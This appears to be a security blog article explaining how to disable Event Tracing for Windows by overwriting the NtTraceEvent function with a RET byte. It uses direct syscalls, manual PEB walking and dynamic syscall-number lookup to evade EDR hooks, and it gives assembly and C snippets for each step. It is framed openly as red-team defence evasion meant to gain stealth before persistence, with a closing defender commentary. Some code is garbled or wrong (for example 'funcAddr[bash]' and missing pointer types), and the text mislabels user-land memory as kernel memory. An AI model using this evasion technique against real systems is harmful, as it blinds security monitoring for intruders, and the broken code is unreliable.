Listen to this Post
Introduction:
Event Tracing for Windows (ETW) is a powerful kernel-level tracing mechanism that provides deep visibility into system behavior, making it a formidable obstacle for red team operators and penetration testers. Bypassing ETW is a critical technique for executing stealthy operations, as it can blind security products that rely on its telemetry. This article delves into a sophisticated method of patching the `NtTraceEvent` syscall in-memory to neutralize ETW, using direct system calls to avoid classic detection vectors.
Learning Objectives:
- Understand the role of ETW in modern security monitoring and why bypassing it is crucial for advanced red team operations.
- Learn how to implement direct system calls (Direct Syscalls) to evade user-land API hooking placed by EDRs.
- Master the technique of manually parsing internal Windows structures to locate and patch critical functions in kernel memory.
You Should Know:
1. The Fundamentals of ETW and Direct Syscalls
ETW is an efficient logging mechanism that allows applications and the OS to log events. Security products consume these events to detect malicious activity. Direct Syscalls are a technique where a payload directly invokes a system call instruction (syscall/sysenter) instead of calling a function in a Windows DLL like ntdll.dll, which is often hooked by EDRs. This is the foundation of the discussed bypass.
2. Locating NtTraceEvent via Internal Windows Structures
To patch NtTraceEvent, you must first find its address in memory. This is done by parsing the Export Address Table (EAT) of ntdll.dll. However, a more advanced method involves manually walking the Process Environment Block (PEB) to find the loaded module list, then parsing the PE headers of `ntdll` to find the function’s export. This avoids using standard Windows API functions that might be monitored.
3. Crafting the Direct Syscall for NtProtectVirtualMemory
To patch the memory region containing NtTraceEvent, you need to change its permissions to writable. This is done using NtProtectVirtualMemory. A direct syscall must be crafted for this function to avoid hooks.
; Example ASM for a direct NtProtectVirtualMemory syscall (x64) mov r10, rcx mov eax, 50h ; SSN for NtProtectVirtualMemory on Windows 10 syscall ret
Step-by-step guide: This assembly stub is placed in your executable’s memory. You load the required parameters into the registers (RCX, RDX, R8, R9 for first four), set the System Service Number (SSN) in EAX, and execute the `syscall` instruction. This directly invokes the kernel without touching the potentially hooked `ntdll` version of the function.
4. The In-Memory Patch: Overwriting with RET
The core of the bypass is patching the `NtTraceEvent` function. The chosen patch is a single `RET` instruction (opcode 0xC3). This causes the function to return immediately when called, effectively disabling it.
// C code snippet demonstrating the patch unsigned char ret_opcode = 0xC3; SIZE_T bytesWritten; NtProtectVirtualMemory(GetCurrentProcess(), (PVOID)&NtTraceEventAddr, &size, PAGE_EXECUTE_READWRITE, &oldProtect); WriteProcessMemory(GetCurrentProcess(), NtTraceEventAddr, &ret_opcode, sizeof(ret_opcode), &bytesWritten); NtProtectVirtualMemory(GetCurrentProcess(), (PVOID)&NtTraceEventAddr, &size, oldProtect, &oldProtect);
Step-by-step guide: First, change the memory protection of the page containing `NtTraceEvent` to PAGE_EXECUTE_READWRITE. Then, write the `0xC3` byte to the start of the function. Finally, restore the original memory protection to avoid detection.
5. Evading Detection with Manual PE Parsing
Using `GetProcAddress` to find `NtTraceEvent` is a red flag. Instead, manually parse the PEB to find the base address of ntdll.dll.
// C code to get ntdll base address from PEB
PEB pPeb = (PEB)__readgsqword(0x60);
LIST_ENTRY firstModule = pPeb->Ldr->InMemoryOrderModuleList.Flink;
LIST_ENTRY currentModule = firstModule;
while (currentModule != NULL) {
LDR_DATA_TABLE_ENTRY moduleEntry = CONTAINING_RECORD(currentModule, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
if (wcscmp(moduleEntry->BaseDllName.Buffer, L"ntdll.dll") == 0) {
HMODULE ntdllBase = (HMODULE)moduleEntry->DllBase;
break;
}
currentModule = currentModule->Flink;
}
Step-by-step guide: The PEB address is retrieved from the GS segment register. The `Ldr` member points to a list of loaded modules. The code iterates through this list until it finds the entry for ntdll.dll, from which it extracts the base address. This is all done without calling any API functions.
6. Calculating System Service Numbers (SSNs) Dynamically
EDRs can obscure SSNs, so hardcoding them (like `0x50` for NtProtectVirtualMemory) is unreliable. A robust implementation parses the EAT of `ntdll.dll` to find a function’s SSN by reading the `syscall` stub.
// Parse ntdll's EAT to find the SSN for a given function
DWORD FindSSN(HMODULE ntdllBase, const char funcName) {
// ... (PE parsing to find export address)
BYTE funcAddr = (BYTE)(ntdllBase + exportRVA);
// Look for mov eax, SSN instruction (0xB8) in the function prologue
if (funcAddr[bash] == 0xB8) {
return (DWORD)(funcAddr + 1);
}
return -1;
}
Step-by-step guide: After finding the address of a function like `NtProtectVirtualMemory` in ntdll.dll, you disassemble its beginning. The first instruction is typically mov eax, SSN. This code reads the next four bytes to extract the SSN value for use in the direct syscall stub.
7. Operational Security and Testing the Bypass
Deploying this technique requires caution. Test extensively in a lab environment. The bypass is volatile; a reboot or certain security products can re-enable ETW. Its primary use is during the initial execution chain of a payload to achieve temporary stealth before other persistence mechanisms are established. Always pair it with other evasion techniques for a robust defense evasion strategy.
What Undercode Say:
- The Arms Race Escalates to Kernel Space. This technique represents a significant evolution in the cat-and-mouse game between attackers and defenders. By operating at such a low level, using direct syscalls and memory patching, attackers are effectively dismantling the foundational trust models of endpoint security, which heavily rely on user-land API monitoring.
- Sophistication is the New Stealth. The move away from well-documented P/Invoke calls towards manual structure parsing and direct syscalls is a clear indicator of increasing sophistication in offensive tooling. This approach leaves far fewer traces for heuristic and behavioral detection systems to analyze, making pure signature-based detection utterly obsolete.
The development and sharing of such tools highlight a critical inflection point in cybersecurity. Defenders can no longer assume the integrity of user-land APIs and must look deeper for anomalies, perhaps toward kernel-level telemetry and hypervisor-based introspection. This bypass is not just a trick; it’s a statement that the most determined adversaries will go to extraordinary lengths to remain hidden. The defense community must respond by integrating more advanced, cross-layer detection capabilities that can identify the manipulation of core OS structures themselves, rather than just monitoring the APIs that interact with them.
Prediction:
The public demonstration of this low-level ETW bypass technique will rapidly catalyze its integration into mainstream offensive security frameworks like Cobalt Strike and Metasploit. Within the next 12-18 months, we predict a surge in fileless attacks that leverage these direct syscall and in-memory patching methods to achieve unprecedented levels of stealth. This will force a paradigm shift in defensive security, accelerating the adoption of Kernel-level EDRs, more widespread use of Threat Intelligence feeds that track syscall anomalies, and ultimately, a push towards hardware-isolated security features like Microsoft’s Pluton to re-establish a root of trust that is far more difficult for attackers to compromise.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: https://lnkd.in/p/deVsvZPB – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
